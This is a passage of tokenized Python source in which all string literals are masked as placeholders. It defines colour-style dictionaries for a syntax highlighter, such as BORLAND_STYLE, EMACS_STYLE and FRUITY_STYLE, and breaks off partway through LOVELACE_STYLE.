'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> BORLAND_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> COLORFUL_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> EMACS_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> FRIENDLY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> FRUITY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> IGOR_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> LOVELACE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 